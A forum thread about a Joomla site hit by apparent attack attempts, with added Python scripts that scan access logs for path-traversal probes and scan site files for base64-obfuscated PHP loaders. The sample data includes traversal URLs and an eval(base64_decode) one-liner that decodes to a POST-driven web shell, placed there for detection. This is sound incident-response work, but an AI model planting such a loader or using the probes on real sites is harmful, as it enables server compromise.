Flexi Component entry removed

13 years 11 months ago #7043 by gnomeontherun
I have possibly survived a hacking attempt and am assessing the situation. The only thing that alerted me to the attempt was that the site was borked, but that was because the row for Flexi in the components table was removed. I didn't do it, but somehow it happened. It *appears* to be the only issue I've uncovered.

Any ideas? I see a lot of POST requests to the admin (blind password attempts) and a few carefully molded URIs related to Flexi, but all returned 404.


13 years 11 months ago #7048 by kenmcd
Quite odd. Worth investigating further.

The only way someone could delete that row in the database is to:
- have access to the database, or
- run the FLEXIcontent un-install script, or
- ??

What are the "molded URIs" you are seeing in the logs?



13 years 11 months ago #7071 by gnomeontherun
The strange URLs I saw were trying to call the base Apache password file, like:

index.php?option=com_flexicontent&controler=../../../../../#passfile

I know, it's very bizarre. How does the DB row get removed, but all the files and the rest of the Flexi tables not? So far, no luck figuring out what the issue was, not with my host either. Just very... odd.

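The two things described in these posts, blind POSTs against the administrator login and a traversal-style URI aimed at com_flexicontent, are exactly what a sweep over the access log should pull out. The following is an added example, not code from the original thread or from the FLEXIcontent project. It parses constructed Apache combined-format lines (IPs taken from documentation ranges; `/etc/passwd` is an assumed target standing in for the redacted `#passfile`), percent-decodes every query parameter repeatedly so double-encoded `%252e%252e%252f` probes are caught too, and counts POSTs to `/administrator/index.php` per source. It goes beyond the single URL quoted above by flagging traversal in any parameter, not only `controler`.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-format log lines for illustration only; they are not
# from the original thread. IPs are documentation ranges and the traversal target
# (/etc/passwd) is an assumed one standing in for the post's redacted "#passfile".
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2010:03:12:01 +0000] "POST /administrator/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/May/2010:03:12:02 +0000] "POST /administrator/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/May/2010:03:12:03 +0000] "POST /administrator/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/May/2010:03:12:09 +0000] "GET /index.php?option=com_flexicontent&controler=../../../../../etc/passwd HTTP/1.1" 404 221 "-" "Mozilla/5.0"
198.51.100.4 - - [10/May/2010:03:15:44 +0000] "GET /index.php?option=com_flexicontent&controller=..%252F..%252F..%252Fetc%252Fpasswd%2500 HTTP/1.1" 404 221 "-" "-"
192.0.2.10 - - [10/May/2010:03:20:00 +0000] "GET /index.php?option=com_flexicontent&view=items HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
"""

# Apache combined format: ip ident user [timestamp] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\")


def deep_unquote(value, rounds=3):
    """Percent-decode until stable so %252e%252e%252f (double-encoded ../) is seen as ../."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_traversal_probes(log_text):
    """Return one record per query parameter whose decoded value contains ../ or a NUL byte."""
    probes = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["path"])
        params = parse_qsl(url.query, keep_blank_values=True)  # decodes one layer
        option = dict(params).get("option")
        for name, value in params:
            decoded = deep_unquote(value)
            if TRAVERSAL_RE.search(decoded) or "\x00" in decoded:
                probes.append({
                    "ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                    "option": option, "param": name, "value": decoded,
                })
    return probes


def brute_force_sources(log_text, path="/administrator/index.php", threshold=3):
    """Count POSTs to the admin login per source IP; return those at or above threshold."""
    counts = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and m["method"] == "POST" and urlsplit(m["path"]).path == path:
            counts[m["ip"]] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for p in find_traversal_probes(SAMPLE_LOG):
        print(f"{p['ts']} {p['ip']} {p['option']} {p['param']}={p['value']!r} -> {p['status']}")
    for ip, n in brute_force_sources(SAMPLE_LOG).items():
        print(f"{ip}: {n} POSTs to the administrator login")
```

A 404 on these requests only says nothing was served for that path; the probe still tells you who was looking, and when, which is what to line up against the time the components row disappeared and against the admin login POST bursts from the same sources.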

13 years 11 months ago #7088 by kenmcd
Hmmmm... there is a hack going around which has not yet been fully explained.
At first it was thought to affect only WordPress sites, then Joomla sites were added, and now it appears it is not related to the specific application but to the hosting service.

They gain access to the website and add some code to every file, and then delete their tracks.
Have you found any odd files or modified files?
The files have base64 encoded code so a search for "base64_decode" finds the code.
Some users have downloaded all their website files and run a search locally within those files.

Since it is actually a server hack, your example URL would seem to fit.
Appears they are actually trying to get access to the server.

This is being discussed in the Joomla security forum, and on the WordPress website, and on some security websites ( blog.sucuri.net/ ).
It may be related to a hosting configuration.
GoDaddy and a couple others have been particularly hard hit.

But this still does not explain the one row deleted from the database. :?

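The search for "base64_decode" suggested above, done over a downloaded copy of the site, as an added example that is not code from the thread or from the FLEXIcontent project. It walks a constructed sample tree (written to a temporary directory; the file paths and the injected one-liner are made up for the example), separates a bare `base64_decode()` call, which frameworks use legitimately, from an `eval`/`gzinflate` wrapper or a long base64 literal, and decodes the literal so the analyst sees what the loader does instead of an opaque string.

```python
import base64
import binascii
import os
import re
import tempfile

# Constructed sample tree for illustration only; these are not files from the
# original thread or from the FLEXIcontent project. The injected one-liner is a
# generic eval(base64_decode(...)) loader of the kind the post describes.
SAMPLE_FILES = {
    "index.php": "<?php\ndefine('_JEXEC', 1);\nrequire_once 'includes/framework.php';\n",
    "libraries/joomla/utilities/helper.php":
        "<?php\nfunction decode_token($t) { return base64_decode($t); }\n",
    "components/com_flexicontent/flexicontent.php":
        "<?php eval(base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsneCddKSk7')); ?>\n"
        "<?php\n// legitimate component code would follow here\n",
    "templates/site/index.php":
        "<?php\n<?php @eval(gzinflate(base64_decode('" + "A" * 80 + "'))); ?>\n",
}

SCAN_EXTENSIONS = {".php", ".phtml", ".inc", ".php5"}

# An execution wrapper directly around a decoder, or a long base64 literal fed to
# base64_decode, is rarely legitimate application code: report as high severity.
HIGH_RE = re.compile(
    r"(?:eval|assert|create_function)\s*\(.{0,40}?"
    r"(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("
    r"|base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{40,}['\"]",
    re.I,
)
# Plain base64_decode() calls are common in frameworks; report them for triage only.
LOW_RE = re.compile(r"base64_decode\s*\(", re.I)
LITERAL_RE = re.compile(r"['\"]([A-Za-z0-9+/=]{40,})['\"]")


def decode_preview(line, limit=60):
    """Decode the first long base64 literal on the line so the analyst sees what it hides."""
    m = LITERAL_RE.search(line)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (ValueError, binascii.Error):
        return None
    text = raw.decode("ascii", errors="replace")
    if not text.isprintable():  # compressed or binary payload: show hex instead
        return "hex:" + raw[: limit // 2].hex()
    return text[:limit]


def scan_tree(root):
    """Walk root; return one record per suspicious line with path, line, severity, snippet, decoded."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if os.path.splitext(name)[1].lower() not in SCAN_EXTENSIONS:
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    if HIGH_RE.search(line):
                        severity = "high"
                    elif LOW_RE.search(line):
                        severity = "low"
                    else:
                        continue
                    hits.append({"path": rel, "line": lineno, "severity": severity,
                                 "snippet": line.strip()[:120],
                                 "decoded": decode_preview(line)})
    return hits


def build_sample_tree():
    """Write SAMPLE_FILES into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="joomla-scan-")
    for rel, content in SAMPLE_FILES.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for hit in scan_tree(build_sample_tree()):
        print(f"[{hit['severity']}] {hit['path']}:{hit['line']}  {hit['snippet']}")
        if hit["decoded"]:
            print(f"        decodes to: {hit['decoded']}")
```

Point `scan_tree()` at the downloaded site instead of the sample tree, then compare every high-severity file against a fresh download of the same Joomla and extension versions; a match that is absent from the clean copy is the injected code. A grep of this kind only finds this one obfuscation style, so also look for files that are new or have recent modification times.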
